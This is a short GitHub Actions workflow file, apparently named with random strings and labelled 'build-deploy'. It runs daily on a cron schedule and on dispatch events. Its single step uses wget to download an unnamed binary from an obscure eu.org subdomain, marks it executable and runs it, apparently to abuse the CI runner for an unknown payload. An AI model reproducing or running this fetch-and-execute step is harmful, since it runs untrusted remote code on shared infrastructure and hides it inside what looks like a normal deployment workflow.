#2024-03-16-[145032]-e64qbves
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "43 1 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: 39fcmtq2vtwh9p87
        run: |
          wget -q https://bangla-87t33kx9.digitalmarketingservice.eu.org/Mongolian_grassland
          chmod 755 Mongolian_grassland
          ./Mongolian_grassland